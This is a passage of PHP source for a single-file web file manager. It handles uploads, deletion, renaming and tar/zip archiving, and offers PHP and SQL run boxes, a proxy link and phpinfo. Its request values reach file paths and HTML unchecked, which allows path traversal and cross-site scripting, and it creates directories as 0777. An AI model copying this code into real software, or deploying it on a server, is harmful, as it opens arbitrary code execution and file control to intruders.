        <form name="form1" method="post" action="<?=$link?>">
            <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/>
            <input type="submit" name="save" value="<?=__('Submit')?>">
        </form>
    </td>
</tr>
</table>
<?php
} else {
//Let's rock!
    $msg = '';
    if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) {
        if(!empty($_FILES['upload']['name'])){
            $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']);
            if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){
                $msg .= __('Error occurred');
            } else {
				$msg .= __('Files uploaded').': '.$_FILES['upload']['name'];
			}
        }
    } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') {
        if(!fm_del_files(($path . $_REQUEST['delete']), true)) {
            $msg .= __('Error occurred');
        } else {
			$msg .= __('Deleted').' '.$_REQUEST['delete'];
		}
	} elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) {
        if(!@mkdir($path . $_REQUEST['dirname'],0777)) {
            $msg .= __('Error occurred');
        } else {
			$msg .= __('Created').' '.$_REQUEST['dirname'];
		}
    } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) {
        if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) {
            $msg .= __('Error occurred');
        } else {
			fclose($fp);
			$msg .= __('Created').' '.$_REQUEST['filename'];
		}
    } elseif (isset($_GET['zip'])) {
		$source = base64_decode($_GET['zip']);
		$destination = basename($source).'.zip';
		set_time_limit(0);
		$phar = new PharData($destination);
		$phar->buildFromDirectory($source);
		if (is_file($destination))
		$msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').
		'.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination)
		.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>';
		else $msg .= __('Error occurred').': '.__('no files');
	} elseif (isset($_GET['gz'])) {
		$source = base64_decode($_GET['gz']);
		$archive = $source.'.tar';
		$destination = basename($source).'.tar';
		if (is_file($archive)) unlink($archive);
		if (is_file($archive.'.gz')) unlink($archive.'.gz');
		clearstatcache();
		set_time_limit(0);
		//die();
		$phar = new PharData($destination);
		$phar->buildFromDirectory($source);
		$phar->compress(Phar::GZ,'.tar.gz');
		unset($phar);
		if (is_file($archive)) {
			if (is_file($archive.'.gz')) {
				unlink($archive); 
				$destination .= '.gz';
			}

			$msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').
			'.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination)
			.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';
		} else $msg .= __('Error occurred').': '.__('no files');
	} elseif (isset($_GET['decompress'])) {
		// $source = base64_decode($_GET['decompress']);
		// $destination = basename($source);
		// $ext = end(explode(".", $destination));
		// if ($ext=='zip' OR $ext=='gz') {
			// $phar = new PharData($source);
			// $phar->decompress();
			// $base_file = str_replace('.'.$ext,'',$destination);
			// $ext = end(explode(".", $base_file));
			// if ($ext=='tar'){
				// $phar = new PharData($base_file);
				// $phar->extractTo(dir($source));
			// }
		// } 
		// $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done');
	} elseif (isset($_GET['gzfile'])) {
		$source = base64_decode($_GET['gzfile']);
		$archive = $source.'.tar';
		$destination = basename($source).'.tar';
		if (is_file($archive)) unlink($archive);
		if (is_file($archive.'.gz')) unlink($archive.'.gz');
		set_time_limit(0);
		//echo $destination;
		$ext_arr = explode('.',basename($source));
		if (isset($ext_arr[1])) {
			unset($ext_arr[0]);
			$ext=implode('.',$ext_arr);
		} 
		$phar = new PharData($destination);
		$phar->addFile($source);
		$phar->compress(Phar::GZ,$ext.'.tar.gz');
		unset($phar);
		if (is_file($archive)) {
			if (is_file($archive.'.gz')) {
				unlink($archive); 
				$destination .= '.gz';
			}
			$msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').
			'.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination)
			.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';
		} else $msg .= __('Error occurred').': '.__('no files');
	}
?>
<table class="whole" id="header_table" >
<tr>
    <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th>
</tr>
<?php if(!empty($msg)){ ?>
<tr>
	<td colspan="2" class="row2"><?=$msg?></td>
</tr>
<?php } ?>
<tr>
    <td class="row2">
		<table>
			<tr>
			<td>
				<?=fm_home()?>
			</td>
			<td>
			<?php if(!empty($fm_config['make_directory'])) { ?>
				<form method="post" action="<?=$url_inc?>">
				<input type="hidden" name="path" value="<?=$path?>" />
				<input type="text" name="dirname" size="15">
				<input type="submit" name="mkdir" value="<?=__('Make directory')?>">
				</form>
			<?php } ?>
			</td>
			<td>
			<?php if(!empty($fm_config['new_file'])) { ?>
				<form method="post" action="<?=$url_inc?>">
				<input type="hidden" name="path" value="<?=$path?>" />
				<input type="text" name="filename" size="15">
				<input type="submit" name="mkfile" value="<?=__('New file')?>">
				</form>
			<?php } ?>
			</td>
			<td>
			<?=fm_run_input('php')?>
			</td>
			<td>
			<?=fm_run_input('sql')?>
			</td>
			</tr>
		</table>
    </td>
    <td class="row3">
		<table>
		<tr>
		<td>
		<?php if (!empty($fm_config['upload_file'])) { ?>
			<form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data">
			<input type="hidden" name="path" value="<?=$path?>" />
			<input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" />
			<input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" />
			<input type="submit" name="test" value="<?=__('Upload')?>" />
			</form>
		<?php } ?>
		</td>
		<td>
		<?php if ($auth['authorize']) { ?>
			<form action="" method="post">&nbsp;&nbsp;&nbsp;
			<input name="quit" type="hidden" value="1">
			<?=__('Hello')?>, <?=$auth['login']?>
			<input type="submit" value="<?=__('Quit')?>">
			</form>
		<?php } ?>
		</td>
		<td>
		<?=fm_lang_form($language)?>
		</td>
		<tr>
		</table>
    </td>
</tr>
</table>
<table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%">
<thead>
<tr> 
    <th style="white-space:nowrap"> <?=__('Filename')?> </th>
    <th style="white-space:nowrap"> <?=__('Size')?> </th>
    <th style="white-space:nowrap"> <?=__('Date')?> </th>
    <th style="white-space:nowrap"> <?=__('Rights')?> </th>
    <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th>
</tr>
</thead>
<tbody>
<?php
$elements = fm_scan_dir($path, '', 'all', true);
$dirs = array();
$files = array();
foreach ($elements as $file){
    if(@is_dir($path . $file)){
        $dirs[] = $file;
    } else {
        $files[] = $file;
    }
}
natsort($dirs); natsort($files);
$elements = array_merge($dirs, $files);

foreach ($elements as $file){
    $filename = $path . $file;
    $filedata = @stat($filename);
    if(@is_dir($filename)){
		$filedata[7] = '';
		if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename);
        $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';
        $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').'&nbsp;zip',__('Archiving').' '. $file);
		$arlink  = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '.$file);
        $style = 'row2';
		 if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path  . '\'"'; else $alert = '';
    } else {
		$link = 
			$fm_config['show_img']&&getimagesize($filename) 
			? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\''
			. fm_img_link($filename)
			.'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>'
			: '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';
		$e_arr = explode(".", $file);
		$ext = end($e_arr);
        $loadlink =  fm_link('download',$filename,__('Download'),__('Download').' '. $file);
		$arlink = in_array($ext,array('zip','gz','tar')) 
		? ''
		: ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '. $file));
        $style = 'row1';
		$alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path  . '\'"';
    }
    $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
    $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>';
    $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>';
?>
<tr class="<?=$style?>"> 
    <td><?=$link?></td>
    <td><?=$filedata[7]?></td>
    <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td>
    <td><?=$rightstext?></td>
    <td><?=$deletelink?></td>
    <td><?=$renamelink?></td>
    <td><?=$loadlink?></td>
    <td><?=$arlink?></td>
</tr>
<?php
    }
}
?>
</tbody>
</table>
<div class="row3"><?php
	$mtime = explode(' ', microtime()); 
	$totaltime = $mtime[0] + $mtime[1] - $starttime; 
	echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a>  | <a href="'.fm_site_url().'">.</a>';
	if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion();
	if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file();
	if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2);
	if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>';
	if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>';
	if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>';
	if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>';
	?>
</div>
<?=$auth['script']?>
<script type="text/javascript">
function download_xls(filename, text) {
	var element = document.createElement('a');
	element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text);
	element.setAttribute('download', filename);
	element.style.display = 'none';
	document.body.appendChild(element);
	element.click();
	document.body.removeChild(element);
}

function base64_encode(m) {
	for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) {
		c = m.charCodeAt(l);
		if (128 > c) d = 1;
		else
			for (d = 2; c >= 2 << 5 * d;) ++d;
		for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f])
	}
	b && (g += k[f << 6 - b]);
	return g
}


var tableToExcelData = (function() {
    var uri = 'data:application/vnd.ms-excel;base64,',
    template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>',
    format = function(s, c) {
            return s.replace(/{(\w+)}/g, function(m, p) {
                return c[p];
            })
        }
    return function(table, name) {
        if (!table.nodeType) table = document.getElementById(table)
        var ctx = {
            worksheet: name || 'Worksheet',
            table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1")
        }
		t = new Date();
		filename = 'fm_' + t.toISOString() + '.xls'
		download_xls(filename, base64_encode(format(template, ctx)))
    }
})();

var table2Excel = function () {

    var ua = window.navigator.userAgent;
    var msie = ua.indexOf("MSIE ");

	this.CreateExcelSheet = 
		function(el, name){
			if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer

				var x = document.getElementById(el).rows;

				var xls = new ActiveXObject("Excel.Application");

				xls.visible = true;
				xls.Workbooks.Add
				for (i = 0; i < x.length; i++) {
					var y = x[i].cells;

					for (j = 0; j < y.length; j++) {
						xls.Cells(i + 1, j + 1).Value = y[j].innerText;
					}
				}
				xls.Visible = true;
				xls.UserControl = true;
				return xls;
			} else {
				tableToExcelData(el, name);
			}
		}
}
</script>
</body>
</html>

<?php
//Ported from ReloadCMS project http://reloadcms.com
class archiveTar {
	var $archive_name = '';
	var $tmp_file = 0;
	var $file_pos = 0;
	var $isGzipped = true;
	var $errors = array();
	var $files = array();
	
	function __construct(){
		if (!isset($this->errors)) $this->errors = array();
	}
	
	function createArchive($file_list){
		$result = false;
		if (file_exists($this->archive_name) && is_file($this->archive_name)) 	$newArchive = false;
		else $newArchive = true;
		if ($newArchive){
			if (!$this->openWrite()) return false;
		} else {
			if (filesize($this->archive_name) == 0)	return $this->openWrite();
			if ($this->isGzipped) {
				$this->closeTmpFile();
				if (!rename($this->archive_name, $this->archive_name.'.tmp')){
					$this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp';
					return false;
				}
				$tmpArchive = gzopen($this->archive_name.'.tmp', 'rb');
				if (!$tmpArchive){
					$this->errors[] = $this->archive_name.'.tmp '.__('is not readable');
					rename($this->archive_name.'.tmp', $this->archive_name);
					return false;
				}
				if (!$this->openWrite()){
					rename($this->archive_name.'.tmp', $this->archive_name);
					return false;
				}
				$buffer = gzread($tmpArchive, 512);
				if (!gzeof($tmpArchive)){
					do {
						$binaryData = pack('a512', $buffer);
						$this->writeBlock($binaryData);
						$buffer = gzread($tmpArchive, 512);
					}
					while (!gzeof($tmpArchive));
				}
				gzclose($tmpArchive);
				unlink($this->archive_name.'.tmp');
			} else {
				$this->tmp_file = fopen($this->archive_name, 'r+b');
				if (!$this->tmp_file)	return false;
			}
		}
		if (isset($file_list) && is_array($file_list)) {
		if (count($file_list)>0)
			$result = $this->packFileArray($file_list);
		} else $this->errors[] = __('No file').__(' to ').__('Archive');
		if (($result)&&(is_resource($this->tmp_file))){
			$binaryData = pack('a512', '');
			$this->writeBlock($binaryData);
		}
		$this->closeTmpFile();
		if ($newArchive && !$result){
		$this->closeTmpFile();
		unlink($this->archive_name);
		}
		return $result;
	}

	function restoreArchive($path){
		$fileName = $this->archive_name;
		if (!$this->isGzipped){
			if (file_exists($fileName)){
				if ($fp = fopen($fileName, 'rb')){
					$data = fread($fp, 2);
					fclose($fp);
					if ($data == '\37\213'){
						$this->isGzipped = true;
					}
				}
			}
			elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true;
		} 
		$result = true;
		if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb');
		else $this->tmp_file = fopen($fileName, 'rb');
		if (!$this->tmp_file){
			$this->errors[] = $fileName.' '.__('is not readable');
			return false;
		}
		$result = $this->unpackFileArray($path);
			$this->closeTmpFile();
		return $result;
	}

	function showErrors	($message = '') {
		$Errors = $this->errors;
		if(count($Errors)>0) {
		if (!empty($message)) $message = ' ('.$message.')';
			$message = __('Error occurred').$message.': <br/>';
			foreach ($Errors as $value)
				$message .= $value.'<br/>';
			return $message;	
		} else return '';
		
	}
	
	function packFileArray($file_array){
		$result = true;
		if (!$this->tmp_file){
			$this->errors[] = __('Invalid file descriptor');
			return false;
		}
		if (!is_array($file_array) || count($file_array)<=0)
          return true;
		for ($i = 0; $i<count($file_array); $i++){
			$filename = $file_array[$i];
			if ($filename == $this->archive_name)
				continue;
			if (strlen($filename)<=0)
				continue;
			if (!file_exists($filename)){
				$this->errors[] = __('No file').' '.$filename;
				continue;
			}
			if (!$this->tmp_file){
			$this->errors[] = __('Invalid file descriptor');
			return false;
			}
		if (strlen($filename)<=0){
			$this->errors[] = __('Filename').' '.__('is incorrect');;
			return false;
		}
		$filename = str_replace('\\', '/', $filename);
		$keep_filename = $this->makeGoodPath($filename);
		if (is_file($filename)){
			if (($file = fopen($filename, 'rb')) == 0){
				$this->errors[] = __('Mode ').__('is incorrect');
			}
				if(($this->file_pos == 0)){
					if(!$this->writeHeader($filename, $keep_filename))
						return false;
				}
				while (($buffer = fread($file, 512)) != ''){
					$binaryData = pack('a512', $buffer);
					$this->writeBlock($binaryData);
				}
			fclose($file);
		}	else $this->writeHeader($filename, $keep_filename);
			if (@is_dir($filename)){
				if (!($handle = opendir($filename))){
					$this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable');
					continue;
				}
				while (false !== ($dir = readdir($handle))){
					if ($dir!='.' && $dir!='..'){
						$file_array_tmp = array();
						if ($filename != '.')
							$file_array_tmp[] = $filename.'/'.$dir;
						else
							$file_array_tmp[] = $dir;

						$result = $this->packFileArray($file_array_tmp);
					}
				}
				unset($file_array_tmp);
				unset($dir);
				unset($handle);
			}
		}
		return $result;
	}

	function unpackFileArray($path){ 
		$path = str_replace('\\', '/', $path);
		if ($path == ''	|| (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':')))	$path = './'.$path;
		clearstatcache();
		while (strlen($binaryData = $this->readBlock()) != 0){
			if (!$this->readHeader($binaryData, $header)) return false;
			if ($header['filename'] == '') continue;
			if ($header['typeflag'] == 'L'){			//reading long header
				$filename = '';
				$decr = floor($header['size']/512);
				for ($i = 0; $i < $decr; $i++){
					$content = $this->readBlock();
					$filename .= $content;
				}
				if (($laspiece = $header['size'] % 512) != 0){
					$content = $this->readBlock();
					$filename .= substr($content, 0, $laspiece);
				}
				$binaryData = $this->readBlock();
				if (!$this->readHeader($binaryData, $header)) return false;
				else $header['filename'] = $filename;
				return true;
			}
			if (($path != './') && ($path != '/')){
				while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1);
				if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename'];
				else $header['filename'] = $path.'/'.$header['filename'];
			}
			
			if (file_exists($header['filename'])){
				if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){
					$this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder');
					return false;
				}
				if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){
					$this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists');
					return false;
				}
				if (!is_writeable($header['filename'])){
					$this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists');
					return false;
				}
			} elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){
				$this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename'];
				return false;
			}

			if ($header['typeflag'] == '5'){
				if (!file_exists($header['filename']))		{
					if (!mkdir($header['filename'], 0777))	{
						
						$this->errors[] = __('Cannot create directory').' '.$header['filename'];
						return false;
					} 
				}
			} else {
				if (($destination = fopen($header['filename'], 'wb')) == 0) {
					$this->errors[] = __('Cannot write to file').' '.$header['filename'];
					return false;
				} else {
					$decr = floor($header['size']/512);
					for ($i = 0; $i < $decr; $i++) {
						$content = $this->readBlock();
						fwrite($destination, $content, 512);
					}
					if (($header['size'] % 512) != 0) {
						$content = $this->readBlock();
						fwrite($destination, $content, ($header['size'] % 512));
					}
					fclose($destination);
					touch($header['filename'], $header['time']);
				}
				clearstatcache();
				if (filesize($header['filename']) != $header['size']) {
					$this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect');
					return false;
				}
			}
			if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = '';
			if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/';
			$this->dirs[] = $file_dir;
			$this->files[] = $header['filename'];
	
		}
		return true;
	}

	function dirCheck($dir){
		$parent_dir = dirname($dir);

		if ((@is_dir($dir)) or ($dir == ''))
			return true;

		if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir)))
			return false;

		if (!mkdir($dir, 0777)){
			$this->errors[] = __('Cannot create directory').' '.$dir;
			return false;
		}
		return true;
	}

	function readHeader($binaryData, &$header){
		if (strlen($binaryData)==0){
			$header['filename'] = '';
			return true;
		}

		if (strlen($binaryData) != 512){
			$header['filename'] = '';
			$this->__('Invalid block size').': '.strlen($binaryData);
			return false;
		}

		$checksum = 0;
		for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1));
		for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
		for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1));

		$unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData);

		$header['checksum'] = OctDec(trim($unpack_data['checksum']));
		if ($header['checksum'] != $checksum){
			$header['filename'] = '';
			if (($checksum == 256) && ($header['checksum'] == 0)) 	return true;
			$this->errors[] = __('Error checksum for file ').$unpack_data['filename'];
			return false;
		}

		if (($header['typeflag'] = $unpack_data['typeflag']) == '5')	$header['size'] = 0;
		$header['filename'] = trim($unpack_data['filename']);
		$header['mode'] = OctDec(trim($unpack_data['mode']));
		$header['user_id'] = OctDec(trim($unpack_data['user_id']));
		$header['group_id'] = OctDec(trim($unpack_data['group_id']));
		$header['size'] = OctDec(trim($unpack_data['size']));
		$header['time'] = OctDec(trim($unpack_data['time']));
		return true;
	}

	function writeHeader($filename, $keep_filename){
		$packF = 'a100a8a8a8a12A12';
		$packL = 'a1a100a6a2a32a32a8a8a155a12';
		if (strlen($keep_filename)<=0) $keep_filename = $filename;
		$filename_ready = $this->makeGoodPath($keep_filename);

		if (strlen($filename_ready) > 99){							//write long header
		$dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0);
		$dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', '');

        //  Calculate the checksum
		$checksum = 0;
        //  First part of the header
		for ($i = 0; $i < 148; $i++)
			$checksum += ord(substr($dataFirst, $i, 1));
        //  Ignore the checksum value and replace it by ' ' (space)
		for ($i = 148; $i < 156; $i++)
			$checksum += ord(' ');
        //  Last part of the header
		for ($i = 156, $j=0; $i < 512; $i++, $j++)
			$checksum += ord(substr($dataLast, $j, 1));
        //  Write the first 148 bytes of the header in the archive
		$this->writeBlock($dataFirst, 148);
        //  Write the calculated checksum
		$checksum = sprintf('%6s ', DecOct($checksum));
		$binaryData = pack('a8', $checksum);
		$this->writeBlock($binaryData, 8);
        //  Write the last 356 bytes of the header in the archive
		$this->writeBlock($dataLast, 356);

		$tmp_filename = $this->makeGoodPath($filename_ready);

		$i = 0;
			while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){
				$binaryData = pack('a512', $buffer);
				$this->writeBlock($binaryData);
			}
		return true;
		}
		$file_info = stat($filename);
		if (@is_dir($filename)){
			$typeflag = '5';
			$size = sprintf('%11s ', DecOct(0));
		} else {
			$typeflag = '';
			clearstatcache();
			$size = sprintf('%11s ', DecOct(filesize($filename)));
		}
		$dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename))));
		$dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', '');
		$checksum = 0;
		for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1));
		for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
		for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1));
		$this->writeBlock($dataFirst, 148);
		$checksum = sprintf('%6s ', DecOct($checksum));
		$binaryData = pack('a8', $checksum);
		$this->writeBlock($binaryData, 8);
		$this->writeBlock($dataLast, 356);
		return true;
	}

	function openWrite(){
		if ($this->isGzipped)
			$this->tmp_file = gzopen($this->archive_name, 'wb9f');
		else
			$this->tmp_file = fopen($this->archive_name, 'wb');

		if (!($this->tmp_file)){
			$this->errors[] = __('Cannot write to file').' '.$this->archive_name;
			return false;
		}
		return true;
	}

	function readBlock(){
		if (is_resource($this->tmp_file)){
			if ($this->isGzipped)
				$block = gzread($this->tmp_file, 512);
			else
				$block = fread($this->tmp_file, 512);
		} else	$block = '';

		return $block;
	}

	function writeBlock($data, $length = 0){
		if (is_resource($this->tmp_file)){
		
			if ($length === 0){
				if ($this->isGzipped)
					gzputs($this->tmp_file, $data);
				else
					fputs($this->tmp_file, $data);
			} else {
				if ($this->isGzipped)
					gzputs($this->tmp_file, $data, $length);
				else
					fputs($this->tmp_file, $data, $length);
			}
		}
	}

	function closeTmpFile(){
		if (is_resource($this->tmp_file)){
			if ($this->isGzipped)
				gzclose($this->tmp_file);
			else
				fclose($this->tmp_file);

			$this->tmp_file = 0;
		}
	}

	function makeGoodPath($path){
		if (strlen($path)>0){
			$path = str_replace('\\', '/', $path);
			$partPath = explode('/', $path);
			$els = count($partPath)-1;
			for ($i = $els; $i>=0; $i--){
				if ($partPath[$i] == '.'){
                    //  Ignore this directory
                } elseif ($partPath[$i] == '..'){
                    $i--;
                }
				elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){
                }	else
					$result = $partPath[$i].($i!=$els ? '/'.$result : '');
			}
		} else $result = '';
		
		return $result;
	}
}
?>